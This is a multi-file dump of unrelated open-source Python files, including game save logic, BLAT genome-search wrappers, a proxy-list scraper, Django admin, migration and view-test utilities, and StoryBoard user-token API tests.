    fromPath = VBFiles.fixSeparators(fromPath)
    toPath = VBFiles.fixSeparators(toPath)
    shutil.copyfile(fromPath, toPath)

def Name(path, asPath):
    path = VBFiles.fixSeparators(path)
    asPath = VBFiles.fixSeparators(asPath)
    os.rename(path, asPath)
# ----------------------------------------------------------------------
# File: qrogue/management/save_data.py
# Repo: 7Magic7Mike7/Qrogue (MIT)
# ----------------------------------------------------------------------
from qrogue.game.logic.actors import Player, Robot
from qrogue.game.logic.actors.controllables import TestBot, LukeBot
from qrogue.game.world.map import CallbackPack
from qrogue.util import Logger, PathConfig, AchievementManager, RandomManager, CommonPopups, CheatConfig
from qrogue.util.achievements import Achievement


class SaveData:
    __ROBOT_SECTION = "[Robots]"
    __COLLECTIBLE_SECTION = "[Collectibles]"
    __ACHIEVEMENT_SECTION = "[Achievements]"

    __instance = None

    @staticmethod
    def instance() -> "SaveData":
        if SaveData.__instance is None:
            Logger.instance().throw(Exception("This singleton has not been initialized yet!"))
        return SaveData.__instance

    @staticmethod
    def __empty_save_file() -> str:
        pass

    def __init__(self):
        if SaveData.__instance is not None:
            Logger.instance().throw(Exception("This class is a singleton!"))
        else:
            self.__player = Player()
            path = PathConfig.find_latest_save_file()
            content = ""
            try:
                content = PathConfig.read(path, in_user_path=True).splitlines()
            except FileNotFoundError:
                Logger.instance().error(NotImplementedError("This line should not be reachable! Please send us the log "
                                                            "files so we can fix the issue as soon as possible. "
                                                            "Thank you!"))
            index = content.index(SaveData.__ACHIEVEMENT_SECTION)
            achievement_list = []
            for i in range(index + 1, len(content)):
                achievement = Achievement.from_string(content[i])
                if achievement:
                    achievement_list.append(achievement)
            self.__achievements = AchievementManager(achievement_list)

            self.__available_robots = [
                TestBot(CallbackPack.instance().game_over),
                LukeBot(CallbackPack.instance().game_over),
            ]

            SaveData.__instance = self

    @property
    def achievement_manager(self) -> AchievementManager:
        return self.__achievements

    @property
    def player(self) -> Player:
        return self.__player

    def get_expedition_seed(self) -> int:
        return RandomManager.instance().get_seed(msg="SaveData.get_expedition_seed()")  #7 # todo implement

    def available_robots(self) -> iter:
        return iter(self.__available_robots)

    def get_robot(self, index: int) -> Robot:
        if 0 <= index < len(self.__available_robots):
            return self.__available_robots[index]
        return None

    def save(self) -> CommonPopups:
        if CheatConfig.did_cheat():
            return CommonPopups.NoSavingWithCheats
        try:
            data = ""
            data += f"{SaveData.__ROBOT_SECTION}\n"
            data += f"{SaveData.__COLLECTIBLE_SECTION}\n"
            data += f"{SaveData.__ACHIEVEMENT_SECTION}\n"
            data += f"{self.achievement_manager.to_string()}\n"
            PathConfig.new_save_file(data)
            return CommonPopups.SavingSuccessful
        except:
            return CommonPopups.SavingFailed
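The class above uses a classic eager-guard singleton: `__init__` refuses to run a second time and `instance()` hands back the registered object. The same pattern in isolation, with plain `raise` standing in for the game's `Logger.instance().throw` (names here are illustrative, not part of the Qrogue code base):

```python
class Singleton:
    __instance = None

    @staticmethod
    def instance():
        if Singleton.__instance is None:
            raise Exception("This singleton has not been initialized yet!")
        return Singleton.__instance

    def __init__(self):
        if Singleton.__instance is not None:
            raise Exception("This class is a singleton!")
        # first construction registers itself as the shared instance
        Singleton.__instance = self

first = Singleton()
assert Singleton.instance() is first
try:
    Singleton()  # second construction is rejected
except Exception as exc:
    print(exc)   # -> This class is a singleton!
```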
# ----------------------------------------------------------------------
# File: ulutil/blat.py
# Repo: churchlab/ulutil (Apache-2.0)
# ----------------------------------------------------------------------

# Copyright 2014 Uri Laserson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# BLAT tools
# based on Sri's code
import sys
import subprocess
import os
import signal
import time
from ulutil import seqtools
hg_idx = '~/genome/hg19.2bit'
def start_gfServer(file2idx=hg_idx,tileSize=11,stepSize=2,minMatch=2,maxGap=4,repMatch=1000000,debug=False):
    params = (tileSize,stepSize,minMatch,maxGap,repMatch,file2idx)
    cmd = "gfServer start -tileSize=%i -stepSize=%i -minMatch=%i -maxGap=%i -repMatch=%i localhost 17779 %s" % params
    if debug: print "Command is:\n%s" % cmd
    p = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE)
    time.sleep(660)
    print "Finished starting up BLAT server (hopefully)."
    return p

def is_server_running():
    p = subprocess.Popen('ps -A',shell=True,stdout=subprocess.PIPE)
    lines = p.stdout.readlines()
    for line in lines:
        if 'gfServer' in line:
            return True
    return False

def stop_gfServer(p=None):
    if p != None:
        os.kill(p.pid,signal.SIGTERM)
        time.sleep(5)
    else:
        pids = []
        p = subprocess.Popen('ps -A',shell=True,stdout=subprocess.PIPE)
        lines = p.stdout.readlines()
        for line in lines:
            if 'gfServer' in line:
                pids.append(int(line.split()[0]))
        for pid in pids:
            os.kill(pid,signal.SIGTERM)
        time.sleep(5)

# HACK/BUG: for some reason gfClient is doubling the directory prefix. It works if
# file2idx='/'
# def search_sequences(seqs,file2idx=hg_idx,minScore=20,minIdentity=70,debug=False):
def search_sequences(seqs,file2idx='/',minScore=15,minIdentity=70,debug=False):
    if not is_server_running():
        raise RuntimeError, "BLAT server not running."

    # generate query
    if hasattr(seqs[0],'format'):
        query = ''.join([s.format('fasta') for s in seqs])
    else:
        query = ''.join(['>query%i\n%s\n' % (i,s) for (i,s) in enumerate(seqs)])

    # define and run command
    nibdir = os.path.dirname(file2idx)
    params = (minScore,minIdentity,nibdir)
    cmd = "gfClient -minScore=%i -minIdentity=%i -nohead localhost 17779 %s /dev/stdin /dev/stdout" % params
    if debug: print cmd
    p = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE)
    p.stdin.write( query )
    p.stdin.close()

    # process output
    num = 0
    for line in p.stdout:
        if debug: print line
        if line == "Output is in /dev/stdout\n":
            continue
        num += 1
    return num

# HACK/BUG: for some reason gfClient is doubling the directory prefix. It works if
# file2idx='/'
def search_sequence(seq,file2idx='/',minScore=15,minIdentity=50,debug=False):
    return search_sequences([seq],file2idx,minScore,minIdentity,debug)
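`search_sequences` talks to gfClient by writing the FASTA query to the child's stdin and counting the lines it writes back. The same pipe pattern can be sketched against a harmless stand-in child (Python echoing its stdin), so it runs without a BLAT server; `communicate()` is used instead of separate `write()`/`close()` calls because it avoids pipe deadlocks on large queries:

```python
import sys
import subprocess

def count_output_lines(lines):
    # stand-in for gfClient: a child process that echoes its stdin back
    proc = subprocess.Popen(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.stdin.read())"],
        stdin=subprocess.PIPE, stdout=subprocess.PIPE, text=True)
    out, _ = proc.communicate("".join("%s\n" % l for l in lines))
    return len(out.splitlines())

print(count_output_lines([">query0", "ACGT"]))  # two lines in, two lines counted -> 2
```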
# ----------------------------------------------------------------------
# File: source/win.py
# Repo: TwinIsland/WPN (MIT)
# ----------------------------------------------------------------------

import requests
import lxml.etree
def getSS(crawler):
    api = 'https://www.youneed.win/free-ss'
    c = lxml.etree.HTML(requests.get(api,headers=crawler.get_crawel_header(),proxies=crawler.get_an_ip()).content)
    r = []
    count = 0
    while True:
        count += 1
        # //*[@id="post-box"]/div/section/table/tbody/tr[1]/td[1]
        xpathIP = '//*[@id="post-box"]/div/section/table/tbody/tr[' + str(count) + ']/td[1]/text()'
        xpathPort = '//*[@id="post-box"]/div/section/table/tbody/tr[' + str(count) + ']/td[2]/text()'
        xpathPass = '//*[@id="post-box"]/div/section/table/tbody/tr[' + str(count) + ']/td[3]/text()'
        xpathEnc = '//*[@id="post-box"]/div/section/table/tbody/tr[' + str(count) + ']/td[4]/text()'
        #xpathPlace = '//*[@id="post-box"]/div/section/table/tbody/tr[' + str(count) + ']/td[6]'
        ip = c.xpath(xpathIP)
        if ip == []:
            break
        r.append({'server':ip[0],'server_port':c.xpath(xpathPort)[0],'password':c.xpath(xpathPass)[0],'method':c.xpath(xpathEnc)[0]})
    return r
# ----------------------------------------------------------------------
# File: config.py
# Repo: Agasper/gaben (MIT)
# ----------------------------------------------------------------------

API_KEY = ""
DONT_PRINT_USAGE_FOR = []
REP_DIRECTORY = "C:\\GabenStorage"
MAX_UPLOAD_SIZE_MB = 300
UNITY = {
    "2017.2.0f3": "C:\\Program Files\\Unity\\Editor\\Unity.exe",
    "2017.4.3f1": "C:\\Program Files\\Unity2017.4.3\\Editor\\Unity.exe"
}

QUOTES = ["I'm a handsome man with a charming personality.",
          "If Nvidia makes better graphics technology, all the games are going to shine",
          "If we come out with a better game, people are going to buy more PCs.",
          "The PC is successful because we're all benefiting from the competition with each other.",
          "I think Windows 8 is a catastrophe for everyone in the PC space.",
          "The Steam store is this very safe, boring entertainment experience",
          "Photoshop should be a free-to-play game.",
          "The easiest way to stop piracy is not by putting antipiracy technology to work",
          "Ninety percent of games lose money; 10 percent make a lot of money",
          "Solar Games perhaps a best place to work",
          "The programmers of tomorrow are the wizards of the future. ",
          "Don't ever, ever try to lie to the internet.",
          "I've always wanted to be a giant space crab.",
          "George Lucas should have distributed the 'source code' to Star Wars.",
          "The PS3 is a total disaster on so many levels",
          "I'd like to thank Sony for their gracious hospitality, and for not repeatedly punching me in the face."]
def get_random_quote():
    import random
    return random.choice(QUOTES)
# ----------------------------------------------------------------------
# File: unittest/scripts/auto/py_shell/scripts/util_help_norecord.py
# Repo: mueller/mysql-shell (Apache-2.0)
# ----------------------------------------------------------------------

#@ util help
util.help()
#@ util help, \? [USE:util help]
\? util
#@ util check_for_server_upgrade help
util.help('check_for_server_upgrade')
#@ util check_for_server_upgrade help, \? [USE:util check_for_server_upgrade help]
\? check_for_server_upgrade
# WL13807-TSFR_1_1
#@ util dump_instance help
util.help('dump_instance');
#@ util dump_instance help, \? [USE:util dump_instance help]
\? dump_instance
# WL13807-TSFR_2_1
#@ util dump_schemas help
util.help('dump_schemas');
#@ util dump_schemas help, \? [USE:util dump_schemas help]
\? dump_schemas
# WL13804-TSFR_6_1
#@ util dump_tables help
util.help('dump_tables');
#@ util dump_tables help, \? [USE:util dump_tables help]
\? dump_tables
# WL13804-TSFR_1_4
#@ util export_table help
util.help('export_table');
#@ util export_table help, \? [USE:util export_table help]
\? export_table
#@ util import_json help
util.help('import_json')
#@ util import_json help, \? [USE:util import_json help]
\? import_json
#@ util import_table help
util.help('import_table')
#@ util import_table help, \? [USE:util import_table help]
\? import_table
#@ util load_dump help
util.help('load_dump')
#@ util load_dump help, \? [USE:util load_dump help]
\? load_dump
# ----------------------------------------------------------------------
# File: globus/afisha/admin.py
# Repo: Ecmek/kino-globus (BSD-3-Clause)
# ----------------------------------------------------------------------

from django.contrib import admin
from .models import Cinema, ShowTime
class CinemaAdmin(admin.ModelAdmin):
list_display = ('title', 'genre', 'trailer', 'description', 'mpaa',)
search_fields = ('title',)
    empty_value_display = '-empty-'
class ShowTimeAdmin(admin.ModelAdmin):
list_display = ('cinema', 'datetime', 'price', 'format',)
autocomplete_fields = ('cinema',)
admin.site.register(Cinema, CinemaAdmin)
admin.site.register(ShowTime, ShowTimeAdmin)
| 25.210526 | 72 | 0.713987 | 51 | 479 | 6.588235 | 0.588235 | 0.095238 | 0.113095 | 0.154762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137787 | 479 | 18 | 73 | 26.611111 | 0.813559 | 0 | 0 | 0 | 0 | 0 | 0.156576 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.818182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
778ea5a8d867748ca6cad50ed3e26fab5276625c | 402 | py | Python | printer/colors.py | lsmucassi/pretty_printer | 3db6a656dc3d299f2f939b24bcd0fbce86045b52 | [
"MIT"
] | null | null | null | printer/colors.py | lsmucassi/pretty_printer | 3db6a656dc3d299f2f939b24bcd0fbce86045b52 | [
"MIT"
] | null | null | null | printer/colors.py | lsmucassi/pretty_printer | 3db6a656dc3d299f2f939b24bcd0fbce86045b52 | [
"MIT"
] | null | null | null | class Colors:
def __init__(self):
        # ANSI SGR codes: 7 = reverse video; 31/32/33/34 = red/green/yellow/blue foreground; 40/47 = black/white background
        self.color_dict = {
"ERROR": ';'.join([str(7), str(31), str(47)]),
"WARN": ';'.join([str(7), str(33), str(40)]),
"INFO": ';'.join([str(7), str(32), str(40)]),
"GENERAL": ';'.join([str(7), str(34), str(47)])
}
def get_cformat(self, message_type):
return self.color_dict[message_type] | 33.5 | 59 | 0.482587 | 52 | 402 | 3.557692 | 0.480769 | 0.151351 | 0.172973 | 0.237838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069444 | 0.283582 | 402 | 12 | 60 | 33.5 | 0.572917 | 0 | 0 | 0 | 0 | 0 | 0.059553 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.1 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7791064a4d310761029e6775a24459c383307554 | 255 | py | Python | doozerlib/constants.py | tnozicka/doozer | c5d4031293153679eacaf6c4d0bcb1fe5e0e2fac | [
"Apache-2.0"
] | null | null | null | doozerlib/constants.py | tnozicka/doozer | c5d4031293153679eacaf6c4d0bcb1fe5e0e2fac | [
"Apache-2.0"
] | null | null | null | doozerlib/constants.py | tnozicka/doozer | c5d4031293153679eacaf6c4d0bcb1fe5e0e2fac | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import, print_function, unicode_literals
# Environment variables to disable Git stdin prompts for username, password, etc
GIT_NO_PROMPTS = {
"GIT_SSH_COMMAND": "ssh -oBatchMode=yes",
"GIT_TERMINAL_PROMPT": "0",
}
| 28.333333 | 80 | 0.768627 | 33 | 255 | 5.545455 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004587 | 0.145098 | 255 | 8 | 81 | 31.875 | 0.834862 | 0.305882 | 0 | 0 | 0 | 0 | 0.308571 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77984a9436d4a3b5de5e37b9e6fe5e44d68889cf | 2,175 | py | Python | tests/utils.py | paul-serafimescu/growth-tracker | 972dd1de534225a9be2e763045db560f420a844c | [
"MIT"
] | 1 | 2021-07-28T04:21:12.000Z | 2021-07-28T04:21:12.000Z | tests/utils.py | paul-serafimescu/growth-tracker | 972dd1de534225a9be2e763045db560f420a844c | [
"MIT"
] | null | null | null | tests/utils.py | paul-serafimescu/growth-tracker | 972dd1de534225a9be2e763045db560f420a844c | [
"MIT"
] | null | null | null | from django.test import TestCase, RequestFactory
from django.contrib.auth.models import AbstractBaseUser, AnonymousUser
from django.views import View
from django.urls import resolve
from abc import ABCMeta, abstractmethod
from typing import Any, Callable, Union, Type
from json import dumps
class ViewTest(TestCase, metaclass=ABCMeta):
    user: Union[AbstractBaseUser, AnonymousUser]
    factory: RequestFactory
    # abstractclassmethod is deprecated; stack classmethod and abstractmethod instead
    @classmethod
    @abstractmethod
def setUpTestData(cls) -> None:
raise NotImplementedError()
class DecoratorError(Exception):
    def __init__(self, message: str, *args: Any, **kwargs: Any):
        super().__init__(message, *args)
        self.message = message
def __str__(self) -> str:
return f"invalid decorator usage: '{self.message}'"
def route(request_type: str, url: str, view: Type[View], headers: dict[str, Any] = {}, data: dict[str, Any] = {}, logged_in: bool = False):
""" this is totally nuts
i can't believe i spent time on this
"""
def inner_function(function: Callable[..., Any]):
def wrapped(self, *args, **kwargs):
if not isinstance(self, ViewTest):
raise DecoratorError('argument is not an instance method')
_, _args, _kwargs = resolve(url)
_data = dumps(data)
            # build requests lazily so only the requested type is constructed
            request_types = {
                'patch': lambda: self.factory.patch(url, _data, content_type='application/json'),
                'get': lambda: self.factory.get(url),
                'post': lambda: self.factory.post(url, _data, content_type='application/json'),
                'put': lambda: self.factory.put(url, _data, content_type='application/json'),
                # 'head': lambda: self.factory.head(url, _data, content_type='application/json'),
                'delete': lambda: self.factory.delete(url, _data, content_type='application/json'),
                'options': lambda: self.factory.options(url, _data, content_type='application/json'),
                'trace': lambda: self.factory.trace(url),
            }
            if (build_request := request_types.get(request_type)) is None:
                raise KeyError('invalid request type')
            request = build_request()
if logged_in:
request.user = self.user
request.headers = headers
return function(self, view.as_view()(request, *_args, **_kwargs), *args, **kwargs)
return wrapped
return inner_function
| 40.277778 | 139 | 0.694253 | 270 | 2,175 | 5.455556 | 0.351852 | 0.059742 | 0.057026 | 0.07332 | 0.13442 | 0.13442 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18069 | 2,175 | 53 | 140 | 41.037736 | 0.826599 | 0.06023 | 0 | 0 | 0 | 0 | 0.102564 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.139535 | false | 0 | 0.186047 | 0.023256 | 0.511628 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
779db1909e89a924773ce4c275b00bc51e3b47f1 | 572 | py | Python | manage_room/migrations/0005_auto_20170129_0024.py | gaybro8777/coding-night-live | b10aeefbcb35fa388a18cb983638ed5983c1874b | [
"MIT"
] | 73 | 2017-01-26T16:45:12.000Z | 2021-07-05T20:27:38.000Z | manage_room/migrations/0005_auto_20170129_0024.py | gaybro8777/coding-night-live | b10aeefbcb35fa388a18cb983638ed5983c1874b | [
"MIT"
] | 93 | 2017-01-25T18:28:02.000Z | 2019-06-10T22:11:38.000Z | manage_room/migrations/0005_auto_20170129_0024.py | dduk-ddak/coding-night-live | be7b0b9a89a9a5332c0980dbc3698602266a1e8c | [
"MIT"
] | 22 | 2017-02-12T12:51:17.000Z | 2020-09-08T02:38:20.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-01-28 15:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('manage_room', '0004_auto_20170127_1505'),
]
operations = [
migrations.RemoveField(
model_name='slide',
name='prev_id',
),
migrations.AlterField(
model_name='slide',
name='next_id',
field=models.PositiveSmallIntegerField(unique=True),
),
]
| 22.88 | 64 | 0.59965 | 59 | 572 | 5.59322 | 0.762712 | 0.054545 | 0.084848 | 0.109091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.080882 | 0.286713 | 572 | 24 | 65 | 23.833333 | 0.727941 | 0.118881 | 0 | 0.235294 | 1 | 0 | 0.115768 | 0.045908 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
779e9f40e92537973be64d2dc298cc911fe154df | 11,165 | py | Python | storyboard/tests/api/test_user_tokens.py | Sitcode-Zoograf/storyboard | 5833f87e20722c524a1e4a0b8e1fb82206fb4e5c | [
"Apache-2.0"
] | null | null | null | storyboard/tests/api/test_user_tokens.py | Sitcode-Zoograf/storyboard | 5833f87e20722c524a1e4a0b8e1fb82206fb4e5c | [
"Apache-2.0"
] | null | null | null | storyboard/tests/api/test_user_tokens.py | Sitcode-Zoograf/storyboard | 5833f87e20722c524a1e4a0b8e1fb82206fb4e5c | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from storyboard.tests import base
class TestUserTokensAsUser(base.FunctionalTest):
def setUp(self):
super(TestUserTokensAsUser, self).setUp()
self.resource = '/users/2/tokens'
self.default_headers['Authorization'] = 'Bearer valid_user_token'
def test_browse(self):
"""Assert a basic browse for your own tokens.
"""
response = self.get_json(self.resource, expect_errors=True)
self.assertEqual(200, response.status_code)
def test_unauthorized_browse(self):
"""Assert a basic browse for someone else's tokens
"""
response = self.get_json('/users/1/tokens', expect_errors=True)
self.assertEqual(403, response.status_code)
def test_get_empty(self):
"""Assert that a user may get an empty record and receive a 404
response.
"""
response = self.get_json(self.resource + '/99', expect_errors=True)
self.assertEqual(404, response.status_code)
def test_simple_create_and_retrieve(self):
"""Assert that a user may create tokens for themselves."""
token = {
'user_id': 2,
'expires_in': 3600,
'access_token': 'test_token'
}
response = self.post_json(self.resource, token)
self.assertEqual(response.json['user_id'], 2)
self.assertEqual(response.json['expires_in'], 3600)
self.assertEqual(response.json['access_token'], 'test_token')
self.assertIsNotNone(response.json['id'])
read_response = self.get_json(self.resource + '/' +
six.text_type(response.json['id']))
self.assertEqual(response.json['user_id'],
read_response['user_id'])
self.assertEqual(response.json['expires_in'],
read_response['expires_in'])
self.assertEqual(response.json['access_token'],
read_response['access_token'])
self.assertIsNotNone(response.json['id'],
read_response['id'])
def test_delete_all_user_tokens(self):
"""Assert that user may delete all his tokens
"""
resource = self.resource + "/delete_all"
self.delete(resource)
response = self.get_json(self.resource, expect_errors=True)
self.assertEqual(401, response.status_code)
def test_create_access_token_autofill(self):
"""Assert that creating a token without the access_token parameter
generates a randomly generated access token.
"""
token = {
'user_id': 2,
'expires_in': 3600
}
response = self.post_json(self.resource, token)
self.assertEqual(response.json['user_id'], 2)
self.assertEqual(response.json['expires_in'], 3600)
self.assertIsNotNone(response.json['access_token'])
self.assertTrue(len(response.json['access_token']) > 10)
self.assertIsNotNone(response.json['id'])
def test_cannot_create_duplicate_token(self):
"""Assert that a user may not violate the uniqueness constraint on user
tokens.
"""
token = {
'user_id': 2,
'expires_in': 3600,
'access_token': 'valid_user_token'
}
response = self.post_json(self.resource, token, expect_errors=True)
self.assertEqual(409, response.status_code)
def test_update_expiration_date(self):
"""Assert that a user may ONLY update the expiration time on their
own tokens.
"""
token = {
'user_id': 2,
'expires_in': 3600
}
response = self.post_json(self.resource, token)
self.assertEqual(response.json['expires_in'], 3600)
self.assertIsNotNone(response.json['access_token'])
self.assertIsNotNone(response.json['id'])
new_record = response.json.copy()
new_record['expires_in'] = 3601
updated = self.put_json(self.resource + '/' +
six.text_type(response.json['id']),
new_record, expect_errors=True)
self.assertEqual(updated.json['expires_in'], 3601)
def test_delete_token(self):
"""Assert that a user may delete their own user tokens."""
token = {
'user_id': 2,
'expires_in': 3600
}
response = self.post_json(self.resource, token)
self.assertEqual(response.json['expires_in'], 3600)
self.assertIsNotNone(response.json['access_token'])
self.assertIsNotNone(response.json['id'])
response = self.delete(self.resource + '/' +
six.text_type(response.json['id']),
expect_errors=True)
self.assertEqual(204, response.status_code)
def test_create_unauthorized(self):
"""Assert that a user cannot create a token for someone else."""
token = {
'user_id': 3,
'expires_in': 3600
}
response = self.post_json('/users/3/tokens', token, expect_errors=True)
self.assertEqual(403, response.status_code)
def test_get_unauthorized(self):
"""Assert that a user cannot retrieve a token for someone else."""
response = self.get_json('/users/1/tokens/1', expect_errors=True)
self.assertEqual(403, response.status_code)
def test_update_unauthorized(self):
"""Assert that a user cannot update a token for someone else."""
token = {
'user_id': 1,
'expires_in': 3601
}
response = self.put_json('/users/1/tokens/1', token,
expect_errors=True)
self.assertEqual(403, response.status_code)
def test_delete_unauthorized(self):
"""Assert that a user cannot delete a token for someone else."""
response = self.delete('/users/1/tokens/1', expect_errors=True)
self.assertEqual(403, response.status_code)
def test_funny_business(self):
"""Assert that a user cannot create a token for someone else by
swapping the ID in the payload while still accessing their own user
id rest endpoint.
"""
token = {
'user_id': 3,
'expires_in': 3600
}
response = self.post_json(self.resource, token, expect_errors=True)
self.assertEqual(403, response.status_code)
class TestUserTokensAsNoUser(base.FunctionalTest):
def setUp(self):
super(TestUserTokensAsNoUser, self).setUp()
self.resource = '/users/2/tokens'
def test_unauthorized_browse(self):
"""Assert a basic browse for someone else's tokens.
"""
response = self.get_json('/users/1/tokens', expect_errors=True)
self.assertEqual(401, response.status_code)
def test_create_unauthorized(self):
"""Assert that a user cannot create a token for someone else."""
token = {
'user_id': 3,
'expires_in': 3600
}
response = self.post_json('/users/3/tokens', token, expect_errors=True)
self.assertEqual(401, response.status_code)
def test_get_unauthorized(self):
"""Assert that a user cannot retrieve a token for someone else."""
response = self.get_json('/users/1/tokens/1', expect_errors=True)
self.assertEqual(401, response.status_code)
def test_update_unauthorized(self):
"""Assert that a user cannot update a token for someone else."""
token = {
'user_id': 1,
'expires_in': 3601
}
response = self.put_json('/users/1/tokens/1', token,
expect_errors=True)
self.assertEqual(401, response.status_code)
def test_delete_unauthorized(self):
"""Assert that a user cannot delete a token for someone else."""
response = self.delete('/users/1/tokens/1', expect_errors=True)
self.assertEqual(401, response.status_code)
class TestUserTokensAsSuperuser(base.FunctionalTest):
def setUp(self):
super(TestUserTokensAsSuperuser, self).setUp()
self.default_headers['Authorization'] = 'Bearer valid_superuser_token'
def test_other_browse(self):
"""Assert a basic browse for someone else's tokens.
"""
response = self.get_json('/users/2/tokens', expect_errors=True)
self.assertEqual(200, response.status_code)
self.assertEqual(len(response.json), 2)
def test_create_other(self):
"""Assert that a superuser CAN create a token for someone else."""
token = {
'user_id': 3,
'expires_in': 3600,
'access_token': 'test_token'
}
response = self.post_json('/users/3/tokens', token)
self.assertEqual(response.json['user_id'], 3)
self.assertEqual(response.json['expires_in'], 3600)
self.assertEqual(response.json['access_token'], 'test_token')
self.assertIsNotNone(response.json['id'])
def test_get_other(self):
"""Assert that a superuser CAN retrieve a token for someone else."""
response = self.get_json('/users/2/tokens/3', expect_errors=True)
self.assertEqual(200, response.status_code)
self.assertEqual(2, response.json['user_id'])
self.assertEqual('valid_user_token', response.json['access_token'])
def test_update_other(self):
"""Assert that a superuser CAN update a token for someone else."""
response = self.get_json('/users/2/tokens/3', expect_errors=True)
self.assertEqual(200, response.status_code)
self.assertEqual(2, response.json['user_id'])
self.assertEqual('valid_user_token', response.json['access_token'])
new_record = response.json.copy()
new_record['expires_in'] = 3601
put_response = self.put_json('/users/2/tokens/3', new_record,
expect_errors=True)
self.assertEqual(200, put_response.status_code)
self.assertEqual(2, put_response.json['user_id'])
self.assertEqual(3601, put_response.json['expires_in'])
def test_delete_other(self):
"""Assert that a superuser CAN delete a token for someone else."""
response = self.delete('/users/2/tokens/3', expect_errors=True)
self.assertEqual(204, response.status_code)
response = self.get_json('/users/2/tokens/3', expect_errors=True)
self.assertEqual(404, response.status_code)
| 37.847458 | 79 | 0.628482 | 1,343 | 11,165 | 5.064036 | 0.131794 | 0.094839 | 0.05411 | 0.067637 | 0.779297 | 0.772386 | 0.697839 | 0.631378 | 0.613586 | 0.56477 | 0 | 0.025306 | 0.260278 | 11,165 | 294 | 80 | 37.97619 | 0.79816 | 0.19382 | 0 | 0.655914 | 0 | 0 | 0.116011 | 0.002393 | 0 | 0 | 0 | 0 | 0.284946 | 1 | 0.145161 | false | 0 | 0.010753 | 0 | 0.172043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77a8d6e727c876130667c55f98c00492271efba6 | 17,554 | py | Python | pjrd/formulaSetupDialog.py | NAustinO/Nutrition-Assistant | 520383cdb2c9c2d087ce6e425786b71235febd4b | [
"MIT"
] | 1 | 2022-03-25T23:31:20.000Z | 2022-03-25T23:31:20.000Z | pjrd/formulaSetupDialog.py | NAustinO/Nutrition-Assistant | 520383cdb2c9c2d087ce6e425786b71235febd4b | [
"MIT"
] | null | null | null | pjrd/formulaSetupDialog.py | NAustinO/Nutrition-Assistant | 520383cdb2c9c2d087ce6e425786b71235febd4b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'formulaSetupDialog.ui'
##
## Created by: Qt User Interface Compiler version 5.15.1
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
import sys
import os
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
